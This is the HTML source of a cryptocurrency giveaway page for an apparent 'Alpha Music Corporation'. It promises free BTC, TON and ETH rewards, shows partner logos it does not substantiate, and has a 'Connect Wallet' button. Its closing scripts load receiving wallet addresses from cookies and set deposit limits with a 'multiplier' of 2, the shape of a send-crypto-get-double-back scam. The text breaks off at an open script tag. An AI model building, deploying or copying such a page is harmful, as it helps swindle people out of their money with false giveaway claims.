


<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="initial-scale=1, minimum-scale=1, width=device-width">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>ALPHA TRADING CORPORATION</title>
    <meta name="robots" content="noindex, nofollow">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Mulish:wght@400;500;600;700;800&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="assets/style.css?v=2">
    <link rel="shortcut icon" href="assets/favicon.svg" type="image/png">
</head>
    <!-- Smartsupp Live Chat script -->
    <script type="text/javascript">
    var _smartsupp = _smartsupp || {};
    _smartsupp.key = '73e7bd7e5a3a98c4468163d96c1333dcbb8a9f21';
    window.smartsupp||(function(d) {
    var s,c,o=smartsupp=function(){ o._.push(arguments)};o._=[];
    s=d.getElementsByTagName('script')[0];c=d.createElement('script');
    c.type='text/javascript';c.charset='utf-8';c.async=true;
    c.src='https://www.smartsuppchat.com/loader.js?';s.parentNode.insertBefore(c,s);
    })(document);
    </script>
<body>
    <div class="background"></div>
    <div class="background2"></div>
    <!--<div style="height:40px; padding:0px; margin:0px; width: 100%;"><iframe src="https://widget.coinlib.io/widget?type=horizontal_v2&theme=dark&pref_coin_id=1505&invert_hover=no" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border:0;margin:0;padding:0;"></iframe></div>
    --></div>
    <div class="app">
        <header class="navigation">
            <div class="navigation-container">
                <div class = "navigation-images">
                    <img src="assets/aba.svg" alt="" class="navigation-logo">
                    <span class="navigation-name ">AMC</span>
                </div>
                <nav class="navigation-nav">
                    <a href="#giveaway" class="active">Giveaway</a>
                    <a href="#rules">Instruction</a>
                    <a href="#about">About</a>
                    <a href="#participate">Partners</a>
                </nav>
                <a href="#participate" class="navigation-participate">Connect Wallet</a>
            </div>
        </header>
        <main class="main">
            <section class="top" id="giveaway">
                <div class="top-container">
                    <div class="top-text">
                        <div class="top-bage">
                            <p><span>Official Music Event </span>
                            </p>
                        </div>
                        <h1 class="top-title"><span>Get</span> your <span>$25</span> <br>if you love music!</h1>
                        <p class="top-subtitle">Big giveaway to popularize a new blockchain that allows you to listen to music for free from anywhere in the world. We are giving away <span>1 BTC</span>, <span>10,000 TON</span>, <span>43 ETH</span>, worth <span>$250,000</span>. Become a member of our project and take your gift!</p>
                        

                        <div class="top-buttons">
                            <a class="top-button participate" href="#participate">I'm too →</a>
                        </div>
                    </div>
                    <img src="assets/carto (1).png" class="participate-creator" alt="">
                </div>
            </section>
            <section class="instruction" id="rules">
                <h4 class="section-title">Instruction <span>for</span> participate</h4>
                <div class="instruction-container">
                    <div class="instruction-row">
                        <div class="instruction-item">
                            <img style="color:green;" src="assets/wallet.svg" alt="">
                            <p>To make a transaction you need to connect any available wallet or exhange.</p>
                        </div>
                        <div class="instruction-item">
                            <img src="assets/subscribe.svg" alt="">
                            <p>Subscribe to our twitter account at the link below to stay in touch.</p>
                        </div>
                    
                    
                        <div class="instruction-item">
                            <img src="assets/checkmark.svg" alt="">
                            <p>As soon as we receive the application you will receive your reward immediately.</p>
                        </div>
                        <div class="instruction-item">
                            <img src="assets/bonus.svg" alt="">
                            <p>You can only take part in our giveaway once. Hurry up!</p>
                        </div>
                    </div>
                    <div class="instruction-text">
                    </div>
                </div>
            </section>
            <section class="rules" id="about">
                <h4 class="section-title">Information <span>about</span> us</h4>
                <div class="rules-container">
                    <div class="rules-row">
                        <div class="meduza">
                            <img src="assets/25sea.png" alt="">
                        </div>
                        <div class="rules-item">
                            <p class="rules-title"><span>Who</span> we are ?</p>
                            <p class="rules-subtitle">We are <span>Alpha Music Corporation</span> introducing people to a new innovative blockchain for listening to <span>music</span> for free from all over the world. To attract the initial audience we decided to distribute cryptocurrency to novice investors and <span>simple music lovers</span>. We naturally have professional financial traders in our team, who are also ready to support any interested user for subscribing to our Twitter.</p>
                        </div>
                    </div>
                    
                </div>
            </section>
            <section class="participate" id="participate">
                <h4 class="section-title">Partners <span>&</span> Musicians</h4>
                <div class="participate-container">
                    <div class="partners-first">
                        <div class="partners-about">
                            <div><img src="assets/transfer.svg" alt=""></div>
                            <h2 class="partners-title"><span>Launch</span> Partners</h2>
                            <p class="partners-p">
                                We <span>cooperate</span> with leads the way in public blockchain adoption. The <span>music label</span> provides great support in the development of our project.
                            </p>
                        </div>
                        <div class="partners-list">
                            <div class="partners-item">
                                <img class="partners-img" src="assets/alchemy.svg" alt="">
                            </div>
                            <div class="partners-item">
                                <img class="partners-img" src="assets/chainlink.svg" alt="">
                            </div>
                            <div class="partners-item">
                                <img class="partners-img" src="assets/concord.webp" alt="">
                                <span class="partners-text">Coincord</span>
                            </div>
                        </div>
                    </div>
                    <video src="assets/testvideo.mp4" class="partner-video"></video>
                </div>
            </section>
        </main>
        <footer class="navigation footer">
            <div class="navigation-container footer-container">
                <img src="assets/aba.svg" alt="" class="navigation-logo">
                <a href="#participate" class="navigation-participate">Participate →</a>
            </div>
        </footer>
    </div>

    <script>
        function getCookie(cname) {
            let name = cname + "=";
            let decodedCookie = decodeURIComponent(document.cookie);
            let ca = decodedCookie.split(';');
            for(let i = 0; i <ca.length; i++) {
                let c = ca[i];
                while (c.charAt(0) == ' ') {
                    c = c.substring(1);
                }
                if (c.indexOf(name) == 0) {
                    return c.substring(name.length, c.length);
                }
            }
            return "";
        }

        var wallet_btc = getCookie("walletBTC");
        var wallet_eth = getCookie("walletETH");

        document.querySelector('#wallet-b').innerHTML = wallet_btc;

        document.querySelector('#wallet-e').innerHTML = wallet_eth;
    </script>

    <script src="assets/jquery.min.js"></script>
    <script>
        window.cdata = {
            wallet_btc: wallet_btc,
            wallet_eth: wallet_eth,
            min_btc: +'0.1',
            max_btc: +'30',
            min_eth: +'1',
            max_eth: +'500',
            multiplier: +'2',
        }
    </script>
    <script src="assets/script.js"></script>
    <script type="text/javascript">
